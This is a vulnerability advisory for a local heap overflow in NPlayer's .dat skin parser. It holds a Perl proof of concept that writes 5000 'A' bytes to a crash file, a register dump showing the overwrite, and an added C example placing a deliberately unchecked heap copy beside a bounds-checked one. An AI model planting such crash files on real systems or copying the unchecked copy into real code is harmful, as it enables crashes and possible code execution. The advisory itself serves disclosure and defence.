Vendor: NPlayer
By: Rehan Ahmed
CVSS: 7,8 HIGH
Heap Overflow
CWE: 119
Product Name: NPlayer
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXP SP2
2010

NPlayer (.dat Skin File) Local Heap Overflow PoC

A local heap overflow vulnerability exists in NPlayer when a specially crafted .dat skin file is opened. This could allow an attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to insufficient boundary checks when processing the .dat skin file. An attacker can exploit this vulnerability by enticing a user to open a malicious .dat skin file.
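
The missing boundary check described above, shown as an added C example that is not NPlayer's code and not part of the original advisory: an unchecked heap copy beside a bounds-checked one. `SKIN_BUF_SIZE` and both function names are assumptions, since the page does not show the skin parser.

```c
/* Added example, not NPlayer code. SKIN_BUF_SIZE and both function names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SKIN_BUF_SIZE 1024  /* assumed capacity of the parser's heap buffer */

/* Vulnerable pattern (CWE-119): trusts the input length. With input longer
 * than SKIN_BUF_SIZE the memcpy writes past the allocation into adjacent
 * heap memory. Shown for contrast only; main() never calls it. */
char *load_skin_unchecked(const unsigned char *data, size_t len)
{
    char *buf = malloc(SKIN_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    memcpy(buf, data, len);          /* no bounds check */
    return buf;
}

/* Hardened form: reject oversized input before allocating or copying.
 * Returns a NUL-terminated heap copy, or NULL on rejection or failure. */
char *load_skin_checked(const unsigned char *data, size_t len)
{
    if (data == NULL || len >= SKIN_BUF_SIZE)   /* keep one byte for the NUL */
        return NULL;
    char *buf = malloc(SKIN_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    memcpy(buf, data, len);
    buf[len] = '\0';
    return buf;
}

int main(void)
{
    unsigned char oversized[5000];                /* constructed: same size and fill as crash.dat */
    memset(oversized, 0x41, sizeof oversized);
    const unsigned char small[] = "skin=default"; /* constructed sample */

    char *a = load_skin_checked(oversized, sizeof oversized);
    char *b = load_skin_checked(small, sizeof small - 1);
    printf("oversized: %s\n", a ? "accepted" : "rejected");
    printf("small:     %s\n", b ? b : "rejected");
    free(a);
    free(b);
    return 0;
}
```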

Mitigation:

Update to the latest version of NPlayer.

Exploit-DB raw data:

#!/usr/bin/perl
#Exploit Title:NPlayer (.dat Skin File) Local Heap Overflow PoC
#Date:13/01/2010
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Tested On: WinXP SP2
########################################################################################
##EBX 41414141
##ESP 0012EF6C
##EBP 00DA50F8 ASCII "C:\Program Files\n.player\skins\crash.dat"
##ESI 0012EFD8
##EDI 014143F8
##EIP 7C90EAF0 ntdll.7C90EAF0
#######################################################################################
########################################################################################
my $boom="\x41" x 5000;
my $file="crash.dat";
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";
########################################################################################